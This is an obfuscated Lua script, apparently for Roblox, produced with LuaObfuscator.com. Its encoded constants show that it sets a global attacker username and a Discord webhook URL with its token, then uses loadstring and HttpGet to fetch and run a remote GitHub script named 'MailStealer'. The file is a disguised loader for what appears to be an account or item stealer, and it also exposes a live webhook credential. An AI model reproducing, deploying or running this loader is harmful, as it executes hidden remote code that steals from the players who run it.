--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v98=v5(v81,v19);v19=nil;return v98;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -(1 -0))^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-1) -(v32-(932 -(857 + 74)))) + ((1634 -(68 + 997)) -(367 + 201)))) ;return v83-(v83%(928 -(214 + 713))) ;end end else local v84=0 + 0 ;local v85;while true do if (v84==((1270 -(226 + 1044)) + 0)) then v85=(879 -((1227 -945) + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v85 + v85))>=v85) and 1) or (0 + (117 -(32 + 85))) ;end end end end local function v21()local v34=(0 -0) + 0 ;local v35;while true do if ((1 + 0)==v34) then return v35;end if (v34==(957 -((1637 -745) + (415 -(87 + 263))))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) + 0 );v18=v18 + 4 ;return (v41 * (66680831 -49903615)) + (v40 * (66488 -(802 + 150))) + (v39 * (689 -433)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,(1428 -(44 + 386)) -((2401 -(998 + 488)) + 82) ,56 -36 ) * ((2 + 0)^(41 -9))) + v42 ;local v46=v20(v43,1208 -(340 + 729 + 118) ,70 -(32 + 7) );local v47=((v20(v43,69 -37 )==(1 + 0)) and  -1) or 1 ;if (v46==((772 -(201 + 571)) -0)) then if (v45==(0 + 0)) then return v47 * (791 -(368 + 423)) ;else local v89=(1138 -(116 + 1022)) -0 ;while true do if (v89==(18 -(10 + (33 -25)))) then v46=1;v44=0 -(0 + 0) ;break;end end end elseif (v46==(2489 -(416 + 26))) then return ((v45==(0 -0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(440 + 583) ) * (v44 + (v45/((3 -1)^(490 -(145 + 293))))) ;end local function v25(v48)local v49=(0 -0) -(0 -0) ;local v50;local v51;while true do if (v49==(10 -7)) then return v6(v51);end if (v49==(859 -(814 + 18 + 27))) then v50=nil;if  not v48 then local v97=0 -0 ;while true do if (v97==0) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=1 + 0 ;end if (v49==(887 -(261 + 624))) then v51={};for v90=1 -0 , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=1083 -(1020 + 60) ;end if (v49==(3 -2)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1425 -(630 + 793) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1637 -(195 + 1442) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((8 -5)==v52) then v59=nil;while true do local v92=0;while true do if (v92==(0 + 0)) then if (v53~=(1 + 0)) then else local v99=0;while true do if (v99~=(396 -(115 + 281))) then else v58=v23();v59={};v99=1;end if (2~=v99) then else v53=2;break;end if (v99==1) then for v144=1,v58 do local v145=0 -0 ;local v146;local v147;local v148;while true do if (v145~=0) then else v146=0;v147=nil;v145=1 + 0 ;end if (v145==1) then v148=nil;while true do if (v146~=0) then else local v168=0;local v169;while true do if (v168==0) then v169=0;while true do if (v169==(0 -0)) then local v177=0;while true do if ((0 -0)==v177) then v147=v21();v148=nil;v177=1;end if (v177==(868 -(550 + 317))) then v169=1 -0 ;break;end end end if (v169~=1) then else v146=1 -0 ;break;end end break;end end end if (1~=v146) then else if (v147==(2 -1)) then v148=v21()~=0 ;elseif (v147==2) then v148=v24();elseif (v147==3) then v148=v25();end v59[v144]=v148;break;end end break;end end end v57[3]=v21();v99=2;end end end if (v53~=0) then else local v100=285 -(134 + 151) ;local v101;while true do if (v100==0) then v101=0;while true do if (v101~=(1667 -(970 + 695))) then else v53=1 -0 ;break;end if (v101==1) then v56={};v57={v54,v55,nil,v56};v101=2;end if ((0 -0)==v101) then local v161=0;while true do if (v161==1) then v101=1;break;end if (v161~=0) then else v54={};v55={};v161=1825 -(1195 + 629) ;end end end end break;end end end v92=1 -0 ;end if (v92==1) then if (v53==(243 -(187 + 54))) then local v102=0;while true do if (v102==0) then for v149=781 -(162 + 618) ,v23() do local v150=0;local v151;local v152;local v153;while true do if (v150~=(1 + 0)) then else v153=nil;while true do if (v151==(0 + 0)) then local v171=0;while true do if (v171~=(1 -0)) then else v151=1 -0 ;break;end if (v171~=(0 + 0)) then else v152=1636 -(1373 + 263) ;v153=nil;v171=1001 -(451 + 549) ;end end end if (v151~=(1 + 0)) then else while true do if ((0 -0)==v152) then v153=v21();if (v20(v153,1,1 -0 )==0) then local v172=1384 -(746 + 638) ;local v173;local v174;local v175;local v176;while true do if ((1 + 0)~=v172) then else v175=nil;v176=nil;v172=2;end if (v172==2) then while true do if (v173==(2 -0)) then if (v20(v175,342 -(218 + 123) ,1582 -(1535 + 46) )~=1) then else v176[2 + 0 ]=v59[v176[2]];end if (v20(v175,2,1 + 1 )==1) then v176[563 -(306 + 254) ]=v59[v176[3]];end v173=3;end if (v173==3) then if (v20(v175,3,3)==(1 + 0)) then v176[7 -3 ]=v59[v176[4]];end v54[v149]=v176;break;end if (v173~=(1467 -(899 + 568))) then else local v179=0;while true do if (v179~=0) then else v174=v20(v153,2 + 0 ,7 -4 );v175=v20(v153,607 -(268 + 335) ,296 -(60 + 230) );v179=1;end if (1==v179) then v173=1;break;end end end if (v173==(573 -(426 + 146))) then local v180=0 + 0 ;while true do if (v180~=(1456 -(282 + 1174))) then else v176={v22(),v22(),nil,nil};if (v174==0) then local v187=1024 -(706 + 318) ;local v188;local v189;while true do if (v187==(1252 -(721 + 530))) then while true do if (v188==(1271 -(945 + 326))) then v189=0 -0 ;while true do if (v189==(0 + 0)) then v176[3]=v22();v176[704 -(271 + 429) ]=v22();break;end end break;end end break;end if (v187==0) then v188=0;v189=nil;v187=1;end end elseif (v174==(1 + 0)) then v176[1503 -(1408 + 92) ]=v23();elseif (v174==2) then v176[3]=v23() -((1088 -(461 + 625))^16) ;elseif (v174==(1291 -(993 + 295))) then local v192=0 + 0 ;while true do if (v192~=(1171 -(418 + 753))) then else v176[3]=v23() -((1 + 1)^16) ;v176[4]=v22();break;end end end v180=1 + 0 ;end if (v180~=(1 + 0)) then else v173=1 + 1 ;break;end end end end break;end if (v172~=0) then else v173=529 -(406 + 123) ;v174=nil;v172=1;end end end break;end end break;end end break;end if (v150==0) then v151=1769 -(1749 + 20) ;v152=nil;v150=1 + 0 ;end end end for v154=1,v23() do v55[v154-(1323 -(1249 + 73)) ]=v28();end v102=1;end if (v102==1) then return v57;end end end break;end end end break;end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2;end if (2==v52) then v57=nil;v58=nil;v52=3;end if ((1145 -(466 + 679))==v52) then v53=0;v54=nil;v52=2 -1 ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=9) then if (v79<=4) then if (v79<=1) then if (v79>0) then v76[v78[2]]();else local v103=0;local v104;while true do if (v103==0) then v104=v78[2];v76[v104]=v76[v104](v13(v76,v104 + 1 ,v71));break;end end end elseif (v79<=2) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==3) then v76[v78[2]]=v62[v78[3]];else v70=v78[3];end elseif (v79<=6) then if (v79>5) then local v107=v78[2];local v108=v76[v78[3]];v76[v107 + 1 ]=v108;v76[v107]=v108[v78[4]];else local v112=v78[2];local v113=v76[v78[3]];v76[v112 + 1 ]=v113;v76[v112]=v113[v78[4]];end elseif (v79<=7) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==8) then v76[v78[2]]=v62[v78[3]];else v76[v78[2]]=v78[3];end elseif (v79<=14) then if (v79<=11) then if (v79>10) then v76[v78[2]]();elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=12) then local v117=v78[2];v76[v117]=v76[v117](v13(v76,v117 + 1 ,v71));elseif (v79==13) then do return;end else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=16) then if (v79>15) then local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==1) then v71=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==2) then for v159=v120,v71 do local v160=0;while true do if (v160==0) then v123=v123 + 1 ;v76[v159]=v121[v123];break;end end end break;end if (v119==0) then v120=v78[2];v121,v122=v69(v76[v120](v13(v76,v120 + 1 ,v78[3])));v119=1;end end else do return;end end elseif (v79<=17) then v70=v78[3];elseif (v79>18) then v76[v78[2]]=v78[3];else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==1) then v71=(v142 + v140) -1 ;v143=0;v139=2;end if (2==v139) then for v163=v140,v71 do v143=v143 + 1 ;v76[v163]=v141[v143];end break;end if (v139==0) then v140=v78[2];v141,v142=v69(v76[v140](v13(v76,v140 + 1 ,v78[3])));v139=1;end end end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703093O00557365724E616D657903083O006368756F70615F3803083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3136393435322O37353330362O373337392F5F59503858433859684D7951584D686E737768754E4A456879734B545139785F49354233644A6B51764D74765735464C58464D32754B354D7761424F434C68615679615200143O0012133O00013O0026073O000B000100020004113O000B0001001208000100033O001208000200043O002006000200020005001213000400064O0010000200044O000C00013O00022O00010001000100010004113O001300010026073O0001000100010004113O00010001001208000100073O003002000100080009001208000100073O0030020001000A000B0012133O00023O0004113O000100012O000F3O00017O00",v9(),...);end
